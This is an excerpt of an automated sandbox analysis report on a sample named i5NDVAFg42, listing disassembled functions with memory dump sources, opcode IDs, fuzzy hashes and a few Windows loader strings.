                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (
                                                              • API String ID: 0-3887548279
                                                              • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                              • Instruction ID: f0ddb07e3eff5560dd887d28896246b9a3e48bb927874217358273c9326eea5b
                                                              • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                              • Instruction Fuzzy Hash: E6021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01782FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PATH
                                                              • API String ID: 0-1036084923
                                                              • Opcode ID: e04218d0ff33452e1f9e3b21845d9230a2802a80bf9937e005dd9c0812764d2c
                                                              • Instruction ID: e5edbeadba9e7c840c6ab6077fbd8e669f2956480010a14f322921ffeea2a92a
                                                              • Opcode Fuzzy Hash: e04218d0ff33452e1f9e3b21845d9230a2802a80bf9937e005dd9c0812764d2c
                                                              • Instruction Fuzzy Hash: 2BF1BC71D406199BDB25EF9CD880ABEFBB1FF48B10F544029E944AB344E734D941CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFE266 Relevance: 1.7, Strings: 1, Instructions: 409COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: KlT
                                                              • API String ID: 0-2244822001
                                                              • Opcode ID: eb1a9fd9885a7f9d24e1d111fb8fb6fd65b450e766f0c5b432748bfe7c2d5b0b
                                                              • Instruction ID: 56c5982087b5b5fee132f0c1f5992865e601993a88cd9a6eb03e579afc1cd93b
                                                              • Opcode Fuzzy Hash: eb1a9fd9885a7f9d24e1d111fb8fb6fd65b450e766f0c5b432748bfe7c2d5b0b
                                                              • Instruction Fuzzy Hash: F11293B2919B85CFD726DF38D89AA503FB2F392720708439DC9A2935D2D7342526CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0180EFA0 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: __aullrem
                                                              • String ID:
                                                              • API String ID: 3758378126-0
                                                              • Opcode ID: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                              • Instruction ID: 77adea0e0869d0c3714d84df1c5c5d634301c334116066d3f492b2d74a5412ed
                                                              • Opcode Fuzzy Hash: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                              • Instruction Fuzzy Hash: 06417C71F001199BDF29DEA9C8805AEF7F2BF88314B18C679D615E7285D634AA548780
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01780100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 53e3874f319183f1110d3a3d31dc66c3662d771c82e425ea03fc0cf9f7d33737
                                                              • Instruction ID: 2d530c7558a51626a9f8f0415c23cfbb6d51825f0beff6e0985ba368c14de80c
                                                              • Opcode Fuzzy Hash: 53e3874f319183f1110d3a3d31dc66c3662d771c82e425ea03fc0cf9f7d33737
                                                              • Instruction Fuzzy Hash: F9A13031A8825D6BDF36EA288844FFEFBB55F55354F0440DDFE4B9B182CAB099488B50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFDD87 Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: KlT
                                                              • API String ID: 0-2244822001
                                                              • Opcode ID: 1a102a2e2e038bc221b0915d15605f7b809ff62bb26de5d08bf44eb8de839878
                                                              • Instruction ID: e73c69411efd7e671d16a6cd4485367c00880fa821b2e29c24e66e9a8d0f2fee
                                                              • Opcode Fuzzy Hash: 1a102a2e2e038bc221b0915d15605f7b809ff62bb26de5d08bf44eb8de839878
                                                              • Instruction Fuzzy Hash: BEE18372918785CFD72ADF38D89AB513FB2F746720708039DCAA1A3492D7382526CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01834420 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 5f8fdadeb411c3b2703116d35c6fe950ab34298e0b714c9efadeee59e08351fb
                                                              • Instruction ID: 0646d7e46c97c348777e8e2552ef50637a26e78d4fb563ab1726fc7706da33e2
                                                              • Opcode Fuzzy Hash: 5f8fdadeb411c3b2703116d35c6fe950ab34298e0b714c9efadeee59e08351fb
                                                              • Instruction Fuzzy Hash: 24A10630A01268AAEF359E68CC44BF97BA49FD6754F0C4498BE46DB2C1D7748B44CAD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFDAE6 Relevance: 1.5, Strings: 1, Instructions: 296COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: KlT
                                                              • API String ID: 0-2244822001
                                                              • Opcode ID: d39dde869273863d1e0bfeb820e2c3fe8a51d220d96f23c814c0982e34a3a9f4
                                                              • Instruction ID: 41dab0319fab04f71da09a1d40e8681a8a02f6ae313736c2d026f58c6081466b
                                                              • Opcode Fuzzy Hash: d39dde869273863d1e0bfeb820e2c3fe8a51d220d96f23c814c0982e34a3a9f4
                                                              • Instruction Fuzzy Hash: A9D19372919B85CFD71ADF38D89AA513FB2F782720708438DCAA2935D2D7342526CF49
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFE1E5 Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: KlT
                                                              • API String ID: 0-2244822001
                                                              • Opcode ID: b42667dca9152fff92dd2316c38549efc46e1ac688b7ee859678a3c295d91fde
                                                              • Instruction ID: 914698743db9c1180464dac662a0bc363aeef37d7b1d001fabf384dbbb4d084e
                                                              • Opcode Fuzzy Hash: b42667dca9152fff92dd2316c38549efc46e1ac688b7ee859678a3c295d91fde
                                                              • Instruction Fuzzy Hash: 39D19572919B85CFD32ADF38D99AA503FB1F382720708439DCAA1935E6D7342526CF49
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01806420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: e88906637b848e9e20a929b38ad8ad7216eb3f87a395f95f31e751e7f277c553
                                                              • Instruction ID: 74478212395efea33a1c2c39b412cc301828e660563db4eee907472b1179e9e4
                                                              • Opcode Fuzzy Hash: e88906637b848e9e20a929b38ad8ad7216eb3f87a395f95f31e751e7f277c553
                                                              • Instruction Fuzzy Hash: 84916371900219AFEB22DF95CC85FAEBBB8EF54B50F600155F600EB1D5E675AE04CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFD5A3 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: KlT
                                                              • API String ID: 0-2244822001
                                                              • Opcode ID: ef29343e400b162dacd3c64c360d248d55293b2b89a9e0e9efd9332c262f4e6e
                                                              • Instruction ID: 07aed9c33511e04f06198d5aa1453d96cd7c77ba81fd6c25b2923fb3979780cf
                                                              • Opcode Fuzzy Hash: ef29343e400b162dacd3c64c360d248d55293b2b89a9e0e9efd9332c262f4e6e
                                                              • Instruction Fuzzy Hash: 09C18472919B85CFD32ADF38D89AA503FB1F786720708439DCAA1934E6D7342526CF49
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0182E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 1eb8dcc9df13811b8eafe6fe9f131bbb7d969198bfc020258eb629f75852bc6b
                                                              • Instruction ID: aa37dd5294f6d7860af10ccf1bd39a4ff5ea90e2150f7e85374bf0a229a94680
                                                              • Opcode Fuzzy Hash: 1eb8dcc9df13811b8eafe6fe9f131bbb7d969198bfc020258eb629f75852bc6b
                                                              • Instruction Fuzzy Hash: 9891AE32900619BADF23ABA4DC88FEFBB79EF45740F100029F505E7251EB349A81CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017BA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalTags
                                                              • API String ID: 0-1106856819
                                                              • Opcode ID: 3cff762d8be117322b0f205a023f053b765d407c73dfac71f53f20a5ab2e6dab
                                                              • Instruction ID: 9d153b893d2cabe34d0a9c557711a97d0ee0e30c46935bb5c85abbd5566b3230
                                                              • Opcode Fuzzy Hash: 3cff762d8be117322b0f205a023f053b765d407c73dfac71f53f20a5ab2e6dab
                                                              • Instruction Fuzzy Hash: E8716AB5E0021A9FDF28CF9CC590AAEFBB1BF48710F14816EEA05A7345E7319941CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01824978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .mui
                                                              • API String ID: 0-1199573805
                                                              • Opcode ID: 9c5c0c62bcb2e27a9b8feb25f5f268887d6792e844668edb1eb375c612103929
                                                              • Instruction ID: 6ef30458db656c7df7998cf477e920ce9e3bce0dc8abd75aaf2321c5914a478f
                                                              • Opcode Fuzzy Hash: 9c5c0c62bcb2e27a9b8feb25f5f268887d6792e844668edb1eb375c612103929
                                                              • Instruction Fuzzy Hash: 83519372D0023A9BDF12DF99D844AAEFBB4AF04B14F054129E916FB254D3749E41CBB4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0179E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              • Opcode ID: 8ea92494ccb54433555e712c63fd24a00a22369b2c3ce3711cccf95bd4777409
                                                              • Instruction ID: 9a6593ab7b2b6449ef61ab3160fc48aac4dfb4f64715842321b977fec459eb76
                                                              • Opcode Fuzzy Hash: 8ea92494ccb54433555e712c63fd24a00a22369b2c3ce3711cccf95bd4777409
                                                              • Instruction Fuzzy Hash: 0B419472508342ABDB11DA75E884B6FF7E8AF88714F44096DFA85D7280EB74D908C793
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017FC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              • Opcode ID: 928e82d57cac3830359e058b494641fd54e39c6315b87c75f680f87a12a2e6a2
                                                              • Instruction ID: fd99c9d32c4681435468376d58ed859a470690c3dd7c3b71d229c3a8a0270c6b
                                                              • Opcode Fuzzy Hash: 928e82d57cac3830359e058b494641fd54e39c6315b87c75f680f87a12a2e6a2
                                                              • Instruction Fuzzy Hash: 5F4134B1D4052DABDB21DA50CC84FDFF77CAB55724F0045A9EB08AB244DB709E898FA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01816B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              • Opcode ID: a3036b66c2c72d4da7f3765fac5560422a2838a3c5c410e494ab2700845b7fe4
                                                              • Instruction ID: 5f03681bb55d9f61e4b3ea7a413773e547a72cd062e35c66a9ca25e7a1fadc05
                                                              • Opcode Fuzzy Hash: a3036b66c2c72d4da7f3765fac5560422a2838a3c5c410e494ab2700845b7fe4
                                                              • Instruction Fuzzy Hash: 9B312032A007199BDB22CB69C854BEEB7BCDF14704F24406CE985DB286E7B5DA45CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017FCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryName
                                                              • API String ID: 0-215506332
                                                              • Opcode ID: 12da1546076309caa2394d925ed8611bafb72100f417f65e518ef00ad3a84e74
                                                              • Instruction ID: 2c3c1d781cf2498f2da55da77d3062db364bf05bd8ca408013a5bf3901b49f74
                                                              • Opcode Fuzzy Hash: 12da1546076309caa2394d925ed8611bafb72100f417f65e518ef00ad3a84e74
                                                              • Instruction Fuzzy Hash: 6031E33A90051DAFEB17DB59C845EAFFB74EB80720F01456DAA15AB351D730AE04EBE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0180892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0180895E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                              • API String ID: 0-702105204
                                                              • Opcode ID: 9e658b8be2fa0830182441a007774986c8f9d6b649d0cff99eb865643b0f9be9
                                                              • Instruction ID: 06e7a0a3bacc13ad453289ca9bddfab1e487f09be91bba5edfcee34962c3bac6
                                                              • Opcode Fuzzy Hash: 9e658b8be2fa0830182441a007774986c8f9d6b649d0cff99eb865643b0f9be9
                                                              • Instruction Fuzzy Hash: 4F01F731B106099BE7667A59DC88A5A7B65EF82354F05001CF64596192CF20AEC0CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017BE8F0 Relevance: 1.0, Instructions: 985COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8c4af0195febb8a1c46ef3854ce4edd40693500425e273d23034b14fb95e99fa
                                                              • Instruction ID: 1a912dcdc19f906e1e6a58b66982be2f9fd806714e0e607723b5db87bf2b729a
                                                              • Opcode Fuzzy Hash: 8c4af0195febb8a1c46ef3854ce4edd40693500425e273d23034b14fb95e99fa
                                                              • Instruction Fuzzy Hash: EC821372F102188BCB58CFADDC916DDB7F2EF88314B19812DE416EB345DA34AC568B45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C516C Relevance: .8, Instructions: 785COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0a0ffc0dd58f6e8f3317263195131b42993dba2890f719aa92067731c07d05c6
                                                              • Instruction ID: a312ffc186646f84c478fcc13543ca6130a493e23c1d55728a08c165e32a2c36
                                                              • Opcode Fuzzy Hash: 0a0ffc0dd58f6e8f3317263195131b42993dba2890f719aa92067731c07d05c6
                                                              • Instruction Fuzzy Hash: 5362A272A0864AAFCF25CF08D4904EEFF62FE55714B49C29CC89A67605D372BA44CBD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01822000 Relevance: .8, Instructions: 757COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 72f711245f0fc52825a267712824a73b4355c23d2e645a6e297ae81f440d7c79
                                                              • Instruction ID: dd2fd00b5ed5bd895a888272d9e44f1953555e7bd3b10fa9ba6c400ad12419a5
                                                              • Opcode Fuzzy Hash: 72f711245f0fc52825a267712824a73b4355c23d2e645a6e297ae81f440d7c79
                                                              • Instruction Fuzzy Hash: 9A42C4316083519FD726CF68C890A6BFBE6BF88304F58492DFA82D7250D771DA85CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017D739A Relevance: .7, Instructions: 705COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 32811f8a807a5278dc6b0a5bc67939e87342d29107c441b714aa192dd7b35c07
                                                              • Instruction ID: 293ef18582618402ad291175e65840f3e20816d849c4c9df55ca8ec4c5e629f1
                                                              • Opcode Fuzzy Hash: 32811f8a807a5278dc6b0a5bc67939e87342d29107c441b714aa192dd7b35c07
                                                              • Instruction Fuzzy Hash: F0429171A0061A8FDB19CF5DC490ABEFBB2FF88318B28855DD552AB351D734E942CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017AB2C0 Relevance: .6, Instructions: 629COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b5ce0a7a72e7d04abc39606d27ad7db8c214ecf1e2e24d9c0405a784aac07ab9
                                                              • Instruction ID: fef22928c6f48132135208d2409eeaf36d46ca20915426999f6b8b40bd0f43ee
                                                              • Opcode Fuzzy Hash: b5ce0a7a72e7d04abc39606d27ad7db8c214ecf1e2e24d9c0405a784aac07ab9
                                                              • Instruction Fuzzy Hash: 3B329D71E00219DBDB24CFA8D894BAEFBB1FF94714F58026DE905AB381E7359901CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01818158 Relevance: .6, Instructions: 617COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: da13dd14424ed5b0f2fed9970213ef2dbc2ccbc772a3e1be4769ed6b9eae964e
                                                              • Instruction ID: 40b553d38e5ef7b84551a2512487d8c416afd890c74e24c41fae775854e681b9
                                                              • Opcode Fuzzy Hash: da13dd14424ed5b0f2fed9970213ef2dbc2ccbc772a3e1be4769ed6b9eae964e
                                                              • Instruction Fuzzy Hash: A2424176E002198FEB25CF69C881BADFBF9BF49300F148199E949EB245D7349A85CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01792840 Relevance: .6, Instructions: 605COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a67209e9c9a6cd130662b15483566bc5a2892fe8d3457889ff5195c240d5f5c
                                                              • Instruction ID: cf24d3884d7ae569ee3da24e468c532f9b512931d39fd83339662a8b12b8515e
                                                              • Opcode Fuzzy Hash: 1a67209e9c9a6cd130662b15483566bc5a2892fe8d3457889ff5195c240d5f5c
                                                              • Instruction Fuzzy Hash: 6C32ED70A007558BEB25DF69C8487BEFBF2BFA8304F24411DE4869B285D735A945CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0182A118 Relevance: .6, Instructions: 591COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ca8318dfe68670455d63f7c6d8cd8ac1fe56770936d4cf8fcb8a98846258eb9f
                                                              • Instruction ID: 84ce5c5703fd613c82fbc5bf68d680e48e95c9daf867cda22f8a191f809d3a2f
                                                              • Opcode Fuzzy Hash: ca8318dfe68670455d63f7c6d8cd8ac1fe56770936d4cf8fcb8a98846258eb9f
                                                              • Instruction Fuzzy Hash: 8022C0742046758FEB2ACF2DC094372BBF1AF45304F18845AE986CBA86D735D6D2CB64
                                                              Uniqueness

